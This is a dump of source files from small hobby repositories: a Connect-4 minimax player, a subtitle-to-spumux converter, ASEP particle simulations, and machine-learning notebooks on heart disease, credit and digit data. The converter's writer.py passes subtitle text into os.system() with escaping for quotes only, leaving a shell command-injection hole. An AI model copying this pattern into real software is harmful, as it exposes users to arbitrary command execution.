[ { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7460317611694336, "avg_line_length": 30.5, "blob_id": "7ec2b49dffc6cc3a966152c796613cd4f074a03d", "content_id": "fec8238628fd30a4e586bb4281f97bb922b7b397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 63, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/README.md", "repo_name": "wsong5077/Connect-4-Board-Game", "src_encoding": "UTF-8", "text": "# Connect-4-Board-Game\nan AI that can play connect 4 with you!\n" }, { "alpha_fraction": 0.5118163228034973, "alphanum_fraction": 0.529034435749054, "avg_line_length": 33.395347595214844, "blob_id": "5ef4c511330b0ad2c27b2da9806b18a19789a876", "content_id": "9468cd0102f55c8d22634f6aab9ad3517fa2a3b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2962, "license_type": "no_license", "max_line_length": 118, "num_lines": 86, "path": "/Player.py", "repo_name": "wsong5077/Connect-4-Board-Game", "src_encoding": "UTF-8", "text": "#weijia\nfrom Board import *\nimport random\nclass Player:\n \"\"\"Class that defines a Connect 4 player.\"\"\"\n\n def __init__(self, ox, tbt, ply):\n '''\n string ox will be either 'X' or 'O'\n tbt is a string representing the tiebreaking type of the player:either 'LEFT', 'RIGHT', or 'RANDOM'\n ply will be a nonnegative integer representing the number of moves that the player should look into the future\n '''\n self.symbol=ox\n self.tbt=tbt\n self.ply=ply\n\n def __repr__(self):\n output = \"\"\n output += \"Player for \" + self.symbol + \"\\n\"\n output += \" with tiebreak: \" + self.tieRule + \"\\n\"\n output += \" and ply == \" + str(self.ply) + \"\\n\"\n return output\n \n \n def oppChar(self):\n \"\"\"Return the opposite game piece character.\"\"\"\n if self.symbol == \"O\": return \"X\"\n else: return \"O\"\n\n def scoreBoard(self, b):\n \"\"\"Return the score for the given board b.\n 100.0 if the board b is a win for self\n 50.0 if it is neither a win nor a loss for self\n 0.0 if it is a loss for self\"\"\"\n if self.symbol=='X':other='O'\n else:other='X'\n if b.winsFor(self.symbol)==True and b.winsFor(other)!=True: return 100.0\n elif b.winsFor(other)==True and b.winsFor(self.symbol)!=True: return 0.0\n else: return 50.0\n\n\n def tiebreakMove(self, scores):\n \"\"\"Return column number of move based on self.tbt.\"\"\"\n highest=max(scores)\n lst=[]\n for i in range(len(scores)):\n if scores[i]==highest: lst.append(i)\n if self.tbt== 'LEFT':\n return lst[0]\n if self.tbt== 'RIGHT':\n return lst[-1]\n if self.tbt== 'RANDOM':\n return random.choice(lst)\n\n def scoresFor(self, b):\n \"\"\"Return a list of scores for board d, one score for each column\n of the board.\"\"\"\n width=0\n for col in range(b.width):\n width+=1\n lst=[50.0]*width\n for col in range(b.width):\n if b.allowsMove(col)==False:\n lst[col]=-1.0\n elif self.scoreBoard(b)==100.0:\n lst[col]=100.0\n elif self.scoreBoard(b)==0.0:\n lst[col]=0.0\n elif self.ply==0:\n lst[col]=50.0\n else:\n b.addMove(col,self.symbol)\n if b.isFull()==True: \n lst[col]=50.0\n else:\n lst_op_score=Player(self.oppChar(), self.tbt, self.ply-1).scoresFor(b)\n lst[col]=100-max(lst_op_score)\n b.delMove(col)\n return lst\n\n def nextMove(self, b):\n \"\"\"Accepts a board input and returns the next move for this player,\n where a move is a column in which the player should place its\n game piece.\"\"\"\n scores=self.scoresFor(b)\n return self.tiebreakMove(scores)\n\n\n\t\n" } ]
2
aalien/subtitle2spu
https://github.com/aalien/subtitle2spu
722fe65fb7d7e4c63a76df197c7e75fc4124e963
3ede0b864bfa96e12cd85e1927ace75db473e448
574ce9653244b8becf6afa435c5040c1cb88aff0
refs/heads/master
2020-04-05T21:32:19.927482
2013-01-16T16:42:56
2013-01-16T16:42:56
7,649,488
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5006700754165649, "alphanum_fraction": 0.5017421841621399, "avg_line_length": 31.434782028198242, "blob_id": "6c39ec686be6c7718e5f3f3b61db3b7248e1deed", "content_id": "51cd56581d74b2d1989ebd479155ad3a0955a47d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3731, "license_type": "permissive", "max_line_length": 78, "num_lines": 115, "path": "/writer.py", "repo_name": "aalien/subtitle2spu", "src_encoding": "UTF-8", "text": "import sys\nimport os\n\nclass SubtitleWriter:\n \"\"\" Writer module for parsers\n \"\"\"\n def __init__( self, font, fontsize, fillcolor, outlinecolor, outlinewidth,\n resolution ):\n \"\"\" Initializer\n \n Parameters:\n font: Name of the font used for subtitles\n fontsize: Size of the font used for subtitles\n fillcolor: Color to fill the text with\n outlinecolor: Color for the outline of the text\n outlinewidth: Width of the texts' outline\n resolution: Resolution of the movie\n \"\"\"\n # Template for convert command\n self.convert = (\n \"convert -size %(resolution)s xc:none \" +\n \"-fill %(fillcolor)s -stroke %(strokecolor)s \" +\n \"-strokewidth %(strokewidth)s -font %(fontname)s \" +\n \"-pointsize %(fontsize)s +antialias -colors 4 -gravity south \"\n ) % {\n \"resolution\": resolution,\n \"fillcolor\": fillcolor,\n \"strokecolor\": outlinecolor,\n \"strokewidth\": outlinewidth,\n \"fontname\": font,\n \"fontsize\": fontsize\n } + \"-draw \\\"text 0,10 '%(subtext)s'\\\" %(filename)s\"\n\n # Template for xml subtitle item\n self.spunode = (\n \"\\t<spu start=\\\"%(starttime)s\\\" end=\\\"%(endtime)s\\\" \" +\n \"image=\\\"%(filename)s\\\" />\\n\"\n )\n \n def open( self, outfilename ):\n \"\"\" Opens a file for xml output\n\n Parameters:\n outfilename: Name for output file or - for stdout\n\n Returns:\n True if outputfile was opened and written succesfully,\n False otherwise\n \"\"\"\n if outfilename == \"-\":\n self.outfile = sys.stdout\n else:\n try:\n self.outfile = open( outfilename, \"w\" )\n except:\n return False\n try:\n self.outfile.write( \"<subpictures>\\n\" )\n self.outfile.write( \" <stream>\\n\" )\n except:\n if self.outfile != sys.stdout:\n self.outfile.close()\n return False\n return True\n\n def write( self, number, starttime, endtime, text,\n filename=\"subtitle_%s.png\" ): \n \"\"\" Writer function that parsers should call\n \n Parameters:\n number: Running number for the subtitle\n starttime, endtime: start and end time of the subtitle\n text: subtitle's text\n filename: filename for subtitle image\n\n Returns:\n True if subtitle was written succesfully,\n False otherwise\n \"\"\"\n # Fill in the templates\n command = self.convert % {\n \"subtext\": text.replace( \"\\'\", \"\\\\\\'\" ).replace( \"\\\"\", \"\\\\\\\"\" ),\n \"filename\": filename % number\n }\n\n node = self.spunode % {\n \"starttime\": starttime,\n \"endtime\": endtime,\n \"filename\": filename % number\n }\n \n print command\n os.system( command )\n try:\n self.outfile.write( node )\n except:\n return False\n return True\n\n def close( self ):\n \"\"\" Finalizer function which closes the output file\n\n Returns:\n True if output file was written and closed succesfully,\n False otherwise\n \"\"\"\n try:\n self.outfile.write( \" </stream>\\n\" )\n self.outfile.write( \"</subpictures>\\n\" )\n except:\n return False\n finally:\n if self.outfile != sys.stdout:\n self.outfile.close()\n return True\n\n" }, { "alpha_fraction": 0.5736568570137024, "alphanum_fraction": 0.5863662362098694, "avg_line_length": 26.4761905670166, "blob_id": "9c3f7b98450686c41ccb5bf7bad60e54f85ec0c3", "content_id": "e7129aaaf5f828bb1bfed2c034aac3bc17da417c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3462, "license_type": "permissive", "max_line_length": 82, "num_lines": 126, "path": "/subtitle2spu.py", "repo_name": "aalien/subtitle2spu", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# subtitle2spu.\n# Creates png images and an xml file from subtitles for use with spumux.\n# Copyright (C) 2008 Antti Laine <[email protected]>\n\nimport os\nimport sys\nimport getopt\n\nfrom writer import SubtitleWriter\n\ndef showUsage():\n print \"\"\"\nUsage: subtitle2spu [OPTION] FILE\n\n --font=FONT\\tsubtitle font\n\\t\\t\\tdefault is Arial-Bold\n\\t\\t\\tconvert -list font for available fonts\n --fill=COLOR\\tfill color\n\\t\\t\\tdefault is white\n --outline=COLOR\\toutline color\n\\t\\t\\tdefault is black\n\\t\\t\\tconvert -list color for available colors\n --resolution=WIDTHxHEIGHT\\tresolution of the movie\n\\t\\t\\tdefault is 720x576 (PAL)\n --type=TYPE\\tType of the input file\n\\t\\t\\tDefault is srt\n\\t\\t\\tSupported values: srt\n\n --help, -h\\t\\tdisplay this help text\n --version, -v\\t\\tdisplay version information\n\"\"\"\n\ndef showVersion():\n print \"\"\"\nsubtitle2spu 0.2\nCopyright (C) 2008 Antti Laine <[email protected]>\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY. See COPYING for details.\n\"\"\"\n\ndef main():\n # default values for options\n font = \"Arial-Bold\"\n fontsize = \"28\"\n fillcolor = \"White\"\n outlinecolor = \"Black\"\n outlinewidth = \"2\"\n resolution = \"720x576\"\n type = \"srt\"\n outputfilename = \"-\"\n\n try:\n options, arguments = getopt.getopt(\n sys.argv[1:],\n \"hvo:\", \n [\"font=\", \"fill=\", \"outline=\", \"resolution=\", \"type=\",\n \"output=\", \"help\", \"version\"]\n )\n except:\n showUsage()\n return 1\n\n print options\n print arguments\n\n for option, value in options:\n if option == \"--font\":\n font = value\n elif option == \"--fill\":\n fillcolor = value\n elif option == \"--outline\":\n outlinecolor = value\n elif option == \"--resolution\":\n resolution = value\n elif option == \"--type\":\n type = value\n elif option in (\"--output\", \"-o\"):\n outputfilename = value\n elif option in (\"--help\", \"-h\"):\n showUsage()\n return 0\n elif option in (\"--version\", \"-v\"):\n showVersion()\n return 0\n else:\n showUsage()\n return 1\n\n if len(arguments) == 0:\n inputfilename = \"stdin\"\n inputfile = sys.stdin\n elif len(arguments) == 1:\n inputfilename = arguments[0]\n try:\n inputfile = open( inputfilename, \"r\" )\n except:\n print \"Failed open %s\" %(inputfilename)\n return 1\n else:\n print \"Provide exactly ONE input file.\"\n return 1\n \n if type not in ( \"srt\" ):\n print \"Only Subrip format is supported at the moment.\"\n return 1\n import parsesrt\n\n subtitlewriter = SubtitleWriter( font, fontsize, fillcolor, outlinecolor,\n outlinewidth, resolution ) \n if not subtitlewriter.open(outputfilename):\n print \"Failed to open %s\" %( subtitlewriter.outputfile )\n return 1\n if not parsesrt.parse( inputfile, subtitlewriter ):\n print \"Failed to parse %s\" %( inputfilename )\n if inputfilename != \"stdin\":\n inputfile.close()\n if not subtitlewriter.close():\n print \"Failed to write to %s after parsing\" %( subtitlewriter.outputfile )\n return 1\n return 0\n\nif __name__ == \"__main__\":\n sys.exit( main() )\n" }, { "alpha_fraction": 0.5690809488296509, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 29.98113250732422, "blob_id": "dfa037b7777324451e0447f4a3fdff46dfe27b2e", "content_id": "9a047b0b775222314efe73746ef81b9298cefa95", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1643, "license_type": "permissive", "max_line_length": 73, "num_lines": 53, "path": "/parsesrt.py", "repo_name": "aalien/subtitle2spu", "src_encoding": "UTF-8", "text": "# Copyright (C) 2008 Antti Laine <[email protected]>\n#\n# This file is part of subtitle2spu.\n#\n# subtitle2spu is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# subtitle2spu is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with subtitle2spu. If not, see <http://www.gnu.org/licenses/>.\n\nimport sys\n\n# States\nREADNUMBER = 1\nREADTIME = 2\nREADTEXT = 3\n\ndef parse( file, writer ):\n state = READNUMBER\n linecount = 0\n lines = \"\"\n\n for buf in file:\n if not buf:\n continue\n if state == READNUMBER:\n number = buf.split()[0]\n state = READTIME\n continue\n if state == READTIME:\n starttime = buf.split()[0]\n endtime = buf.split()[2]\n state = READTEXT\n continue\n if state == READTEXT:\n if buf[0] not in (\"\\n\", \"\\r\"):\n linecount += 1\n lines += buf\n else:\n print \"Writing subtitle %s\" %(number)\n if not writer.write( number, starttime, endtime, lines ):\n return False\n state = READNUMBER\n linecount = 0\n lines = \"\"\n return True\n\n" } ]
3
shimagaki/ASEP_inverseASEP
https://github.com/shimagaki/ASEP_inverseASEP
fe5d0b1a39d868beb396ab7c83738af40a40c899
345f6a09da070f42c7d0f2cedc263144c482e0b2
0bca786fa1cc472048a7c5c18c0ddd24b6490e2d
refs/heads/master
2021-11-20T03:05:49.397413
2021-08-09T22:12:42
2021-08-09T22:12:42
98,703,892
1
0
null
2017-07-29T02:53:04
2021-05-12T15:56:38
2021-07-20T20:35:05
null
[ { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 31, "blob_id": "4ef829ef18d1ea50d0e9f192cb270e60055691bb", "content_id": "df429a73edbcb0027d5aca8fd1effb89203bca24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 33, "license_type": "no_license", "max_line_length": 31, "num_lines": 1, "path": "/README.md", "repo_name": "shimagaki/ASEP_inverseASEP", "src_encoding": "UTF-8", "text": "# ASEP and inverse ASEP problem\n\n" }, { "alpha_fraction": 0.4975988268852234, "alphanum_fraction": 0.5182859301567078, "avg_line_length": 25.539215087890625, "blob_id": "53385e7ec2bfd441a794366b5543cbf079352a43", "content_id": "17061979486cbb0d4ba971d4fc01399284d79083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2707, "license_type": "no_license", "max_line_length": 100, "num_lines": 102, "path": "/cyclic_ASEP.py", "repo_name": "shimagaki/ASEP_inverseASEP", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*- \nimport numpy as np\nimport matplotlib.pyplot as plt\n\"\"\"periodic boundary condition\"\"\"\nK = 5; L = 10\n\nclass Particle_Class:\n \"\"\"particles class \n \"\"\"\n def __init__(self,i,x,mu,n):\n self.id = i \n self.x=x\n self.mu = mu \n self.n = n \n \n def set_x(self,x):\n self.x = x \n \n def get_x(self):\n return self.x\n \n def set_n(self,n):\n self.n = n\n\n def get_n(self):\n return self.n\n \n def get_mu(self):\n return self.mu\n \n\ndef init_particles():\n global particles\n \n #------ location -------#\n location = np.arange(L)\n np.random.shuffle(location)\n location = np.sort( np.copy(location[:K]) ) #ex. 0,1,2,3,4,5 -> 0,2,3,5\n \n #------ transfer coefficient -------#\n trans_coeff = np.random.uniform(0,1,K)\n trans_coeff = np.copy(trans_coeff) / np.sum(trans_coeff)\n for i in range(K):\n vacancy_i = ( location[(i+1)%K]-location[i] + L ) % L - 1 \n particles.append( Particle_Class( i, location[i], trans_coeff[i], vacancy_i ) )\n\ndef update():\n global particles \n for i in range(K):\n if(particles[i].n>0):\n if( np.random.uniform() < particles[i].get_mu() ):\n \n x = particles[i].get_x() \n n = particles[i].get_n() \n n_minus = particles[ (i-1+K)%K ].get_n() \n \n particles[i].set_x( (x+1)%L )\n \n particles[i].set_n( n-1 )\n particles[ (i-1+K)%K ].set_n( n_minus + 1 )\n \ndef print_state():\n for i in range(K): \n print i, \",\", particles[i].id, \",\",particles[i].x, \",\", particles[i].mu, \",\", particles[i].n\n\ndef output_state_to_file():\n global f_location, f_vacancy\n for i in range(K):\n f_location.write( str(particles[i].x) + \" \" )\n f_vacancy.write( str(particles[i].n) + \" \" )\n f_location.write(\"\\n\")\n f_vacancy.write(\"\\n\")\n\nif __name__ == \"__main__\":\n particles = []\n init_particles()\n \n fname_location = \"location_K10_L15_N1000000_Twait10.dat\"\n fname_vacancy = \"vacancy_K10_L15_N1000000_Twait10.dat\"\n fname_trans_coeff = \"trans_coeff_.dat\"\n f_location = open(fname_location,\"w\")\n f_vacancy = open(fname_vacancy,\"w\")\n f_trans_coeff = open(fname_trans_coeff,\"w\")\n \n for i in range(K):f_trans_coeff.write( str(particles[i].mu) + \" \" )\n f_trans_coeff.close()\n \n sample_size = 100\n t_wait = 10\n for t in range(sample_size*t_wait):\n update()\n if(t%t_wait == 0):\n output_state_to_file()\n \"\"\" \n print_state() \n print \"\"\n update()\n print_state() \n \"\"\" \n\n f_location.close()\n f_vacancy.close()\n" }, { "alpha_fraction": 0.5488545894622803, "alphanum_fraction": 0.5642823576927185, "avg_line_length": 27.50666618347168, "blob_id": "eaaaef8435c8c0e5038c88c50624843954c974fa", "content_id": "b0ecd76e04774ef7de73eaa3a3ee58698a208a83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2139, "license_type": "no_license", "max_line_length": 107, "num_lines": 75, "path": "/simple_estimate_mu.py", "repo_name": "shimagaki/ASEP_inverseASEP", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*- \nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"periodic boundary condition\"\"\"\nK = 10; L = 15; sample_size = 10000 \n\n#-------- given Data ---------#\ndata_vacancy = []; data_location = [] \nconjugat_mu = []; mu_tru = np.zeros(K)\n\n#-------- parameter ---------#\nmu_model = np.zeros(K) \n\ndef read_data_file():\n global data_vacancy,data_location, mu_tru\n\n fname_vacancy = \"simple_vacancy_K\"+str(K)+\"_L\"+str(L)+\"_N\"+str(sample_size)+\"_every_T1step.dat\"\n fname_trans_coeff = \"simple_trans_coeff_K\"+str(K)+\"_L\"+str(L)+\"_N\"+str(sample_size)+\"_every_T1step.dat\"\n\n f_vacancy = open(fname_vacancy,\"r\")\n f_trans_coeff = open(fname_trans_coeff,\"r\")\n \n #----------- mu_tru -----------#\n coeff_line = f_trans_coeff.readlines()\n coeff_line = np.copy( coeff_line[0].split(\" \") )\n mu_tru = np.copy(map(float, coeff_line[:K]))\n\n #----------- data_vacancy -----------#\n i = 0\n for line in f_vacancy:\n item = line.split(' ')\n del item[-1]\n\n vacancy_single_sample = np.copy(map(int,item) ) \n if(i==0):\n data_vacancy = vacancy_single_sample\n if(i==1):\n data_vacancy = np.append([np.copy(data_vacancy)],[vacancy_single_sample],axis = 0)\n if(i>1):\n data_vacancy = np.append(np.copy(data_vacancy),[vacancy_single_sample],axis = 0)\n i += 1\n \n f_vacancy.close()\n f_trans_coeff.close()\n\ndef calc_mu_model():\n global data_vacancy, mu_model\n \n for k in range(sample_size):\n mu_model = mu_model + data_vacancy[k]\n mu_model = mu_model / float(sample_size)\n\ndef plot_model_and_true(mu_tru,mu_model):\n x = np.linspace(0,0.4,100)\n y = np.linspace(0,0.4,100)\n plt.plot(x,y)\n plt.scatter(mu_tru,mu_model)\n plt.xlabel(\"true parameter\")\n plt.ylabel(\"model parameter\")\n \n plt.grid(True)\n plt.show()\n\nif __name__ == \"__main__\":\n read_data_file()\n calc_mu_model()\n \n mu_model = np.copy(mu_model) / np.sum(mu_model)\n \n print \"\\n\"\n print \"mu_tru=\\n\", mu_tru\n print \"mu_model/sum(abs(mu_model)=\\n\",mu_model\n \n plot_model_and_true(mu_tru,mu_model) \n" } ]
3
VrezhKhalatyan/DataScience-Advanced_Machine_Learning
https://github.com/VrezhKhalatyan/DataScience-Advanced_Machine_Learning
fcafa3254626f81be03cf13524717ccdb365ac51
f200f48ba548cc8b49609d40d3d561da34fd6a90
7897fcea77a23841627229af378a981c405a8e44
refs/heads/master
2020-04-11T19:49:15.153335
2019-08-13T21:50:19
2019-08-13T21:50:19
162,048,186
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6965453028678894, "alphanum_fraction": 0.7086834907531738, "avg_line_length": 22.785184860229492, "blob_id": "d9f4bf3a00be6b699544a40b8542d494996156f7", "content_id": "9938c87b5b7db89183f7bb3e96dec7e10f558dc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3221, "license_type": "no_license", "max_line_length": 230, "num_lines": 135, "path": "/Predict the probability of Heart Disease.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[2]:\n\n\n#Vrezh Khalatyan HW4_Question2\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cluster import KMeans\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\n# In[3]:\n\n\n# reading a CSV file directly from Web (or local drive), and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local drive:\n\nheart_short_df = pd.read_csv('/Users/anitribunyan/Downloads/HW4/Heart_short.csv')\n\nheart_short_df.head()\n\n\n# In[4]:\n\n\n# Creating the Feature Matrix for iris dataset:\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['Age','RestBP','Chol','RestECG', 'MaxHR', 'Oldpeak']\n\n# use the above list to select the features from the original DataFrame\nX = heart_short_df[feature_cols] \n\n# print the first 5 rows\nX.head()\n\n\n# In[5]:\n\n\n# select a Series of labels (the last column) from the DataFrame\ny = heart_short_df['AHD']\nnormalized = preprocessing.scale(X)\nprint(normalized)\n\n\n# In[6]:\n\n\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, \n random_state=3)\n\n# print the size of the traning set:\nprint(X_train.shape)\nprint(y_train.shape)\n\n# print the size of the testing set:\nprint(X_test.shape)\nprint(y_test.shape)\n\n# \"my_logreg\" is instantiated as an \"object\" of LogisticRegression \"class\". \nmy_logreg = LogisticRegression()\n\n# Training ONLY on the training set:\nmy_logreg.fit(X, y)\n\n# Testing on the testing set:\npredict_lr = my_logreg.predict(X_test)\n\n\n# In[7]:\n\n\nfrom sklearn.metrics import accuracy_score\nscore_lr = accuracy_score(y_test, predict_lr)\n\nprint(\"Prediction Accuracy : \" + str(score_lr))\n\n\n# In[8]:\n\n\n#Use Logistic Regression Classifier to predict the probability of Heart Disease based on the training/testing datasets that you built in part (c) (you have to use “my_logreg.predict_proba” method rather than “my_logreg.predict”). \npredict_lr = my_logreg.predict_proba(X_test)\n\nfpr, tpr, thresholds = metrics.roc_curve(y_test, predict_lr[:,1], pos_label='Yes')\n\nprint(fpr)\nprint(tpr)\nprint(\"\\n\")\n# AUC:\nAUC = metrics.auc(fpr, tpr)\nprint(\"AUC : \" + str(AUC))\n\n\n# In[9]:\n\n\n# Importing the \"pyplot\" package of \"matplotlib\" library of python to generate \n# graphs and plot curves:\nimport matplotlib.pyplot as plt\n\n# The following line will tell Jupyter Notebook to keep the figures inside the explorer page \n# rather than openng a new figure window:\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nplt.figure()\n\n# Roc Curve:\nplt.plot(fpr, tpr, color='red', lw=2, \n label='ROC Curve (area = %0.2f)' % AUC)\n\n# Random Guess line:\nplt.plot([0, 1], [0, 1], color='blue', lw=1, linestyle='--')\n\n# Defining The Range of X-Axis and Y-Axis:\nplt.xlim([-0.005, 1.005])\nplt.ylim([0.0, 1.01])\n\n# Labels, Title, Legend:\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver operating characteristic')\nplt.legend(loc=\"lower right\")\n\nplt.show()\n\n" }, { "alpha_fraction": 0.669618546962738, "alphanum_fraction": 0.7050408720970154, "avg_line_length": 19.661972045898438, "blob_id": "7634808fcd1bb64f7785428373f428a169ec540c", "content_id": "d8da5d17f4d8914541852c693254a7a5d06d0330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2936, "license_type": "no_license", "max_line_length": 183, "num_lines": 142, "path": "/Debt Prediction.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\n#Vrezh Khalatyan HW3 Question 2\n# Importing the required packages and libraries\n# we will need numpy and pandas later\nimport numpy as np\nimport pandas as pd\n\n\n# In[2]:\n\n\n#Read Credit csv and assign to Pandas DataFrame\ncredit_df = pd.read_csv('/Users/anitribunyan/Desktop/HW3/Credit.csv')\n\n\n# In[3]:\n\n\n# checking the dataset by printing every 10 lines:\ncredit_df[0::10]\n\n\n# In[4]:\n\n\nfrom sklearn import preprocessing\n# Creating the Feature Matrix:\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['Income', 'Limit', 'Rating', 'Cards', 'Age', 'Education', 'Married']\n\n# use the above list to select the features:\nX = credit_df[feature_cols]\n\n# Another way to do this (notice double bracket!):\nX = credit_df[['Income', 'Limit', 'Rating', 'Cards', 'Age', 'Education', 'Married']]\nX_Norm = preprocessing.scale(X)\n\n# check the size:\nprint(X_Norm.shape)\n\n# show the first 5 rows\nX_Norm[0::10]\n\n\n# In[5]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n# select the target (last column) from the DataFrame\ny = credit_df['Balance']\n\n#Split the dataset into testing and training sets\nX_train, X_test, y_train, y_test = train_test_split(X_Norm, y, test_size=0.24, \n random_state=4)\n\n\n# In[6]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\nlinreg = LinearRegression()\n\n# fitting the model to the training data:\nlinreg.fit(X_train, y_train)\n\n\n# In[15]:\n\n\n# printing Theta0 using attribute \"intercept_\":\nprint(linreg.intercept_)\n\n# printing [Theta1, Theta2, Theta3, Theta4, Theta5, Theta6, Theta7] using attribute \"coef_\":\nprint(linreg.coef_)\n\nprint('\\n')\nprint('The most important coefficient would be the Rating feature with 478.53169403' + '\\n' + 'The least important would be the first feature Income having -264.98372644 ')\n\n\n# In[9]:\n\n\n# make predictions on the testing set\ny_prediction = linreg.predict(X_test)\n\nprint(y_prediction)\n\n\n# In[10]:\n\n\nfrom sklearn import metrics\n\n# Calculating \"Mean Square Error\" (MSE):\nmse = metrics.mean_squared_error(y_test, y_prediction)\n\n# Using numpy sqrt function to take the square root and calculate \"Root Mean Square Error\" (RMSE)\nrmse = np.sqrt(mse)\n\nprint(rmse)\n\n\n# In[11]:\n\n\nfrom sklearn.model_selection import cross_val_score\n\n\nmse_list = cross_val_score(linreg, X, y, cv=10, scoring='neg_mean_squared_error')\n\nprint(mse_list)\n\n\n# In[12]:\n\n\n# in order to calculate root mean square error (rmse), we have to make them positive!\nmse_list_positive = -mse_list\n\n# using numpy sqrt function to calculate rmse:\nrmse_list = np.sqrt(mse_list_positive)\nprint(rmse_list)\n\n\n# In[13]:\n\n\n# calculate the average RMSE as final result of cross validation:\nprint(rmse_list.mean())\n\n\n# In[14]:\n\n\nprint('Without the cross_validation, the performance of the regression was 161.51385491175333 and with the' + '\\n' + '10 fold cross validation the performance was 160.33198910744073')\n\n" }, { "alpha_fraction": 0.7139037251472473, "alphanum_fraction": 0.7332887649536133, "avg_line_length": 24.32203483581543, "blob_id": "74bb255083da61edd96092181a068a8cbe8d8af7", "content_id": "3aba81f5524c787b23e3de8c8f49eb00ed00f4bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1496, "license_type": "no_license", "max_line_length": 95, "num_lines": 59, "path": "/Handwriting Recognition using Machine Learning!.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[22]:\n\n\n#Vrezh Khalatyan Homework 5\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.image as mpimg \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pathlib\nimport imageio\nfrom IPython.display import Image\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\n\n\n# In[23]:\n\n\n# reading a CSV file directly from Web (or local drive), and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local drive:\n\nlabel_df = pd.read_csv('/Users/anitribunyan/Desktop/HW5/label.csv')\nlabel_df.head()\n\n\n# In[24]:\n\n\nnumberOfImages = 1797 # number of images\ndataMatrix = np.zeros((numberOfImages, 64))\n\nfor index in range(numberOfImages):\n dataPath = \"/Users/anitribunyan/Desktop/HW5/Digit/{}.jpg\".format(index)\n image = mpimg.imread(dataPath)\n feature = image.reshape(64)\n dataMatrix[index] = np.copy(feature)\n\n\n# In[25]:\n\n\ny = label_df['digit label']\nX = pd.DataFrame.from_records(dataMatrix)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.21, random_state = 2)\nmy_RandomForest = RandomForestClassifier(n_estimators = 19, bootstrap = True, random_state = 3)\nmy_RandomForest.fit(X_train, y_train)\ny_predict = my_RandomForest.predict(X_test)\n\n\n# In[26]:\n\n\naccuracy_r = accuracy_score(y_test, y_predict)\nprint(\"Random_Forest Classifier Accuracy Score: \" + str(accuracy_r))\n\n" }, { "alpha_fraction": 0.7323806285858154, "alphanum_fraction": 0.7388762831687927, "avg_line_length": 31.05208396911621, "blob_id": "23038f95d1fe94e2006fdae08ffaf3f435a8f84b", "content_id": "d906bcf860123f58c939ce8b323e694d96c7ea56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3079, "license_type": "no_license", "max_line_length": 345, "num_lines": 96, "path": "/VrezhK_Bike_Sharing_Data_Analytics.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# # Predicting With Decision_Tree & Cross_Validation\n\n# The goal is to create a model that predicts the value of a target variable by learning simple decision rules inferred from the data features.\n\n# Cross Validation is used to assess the predictive performance of the models and and to judge how they perform outside the sample to a new data set also known as test data.\n# \n# The motivation to use cross validation techniques is that when we fit a model, we are 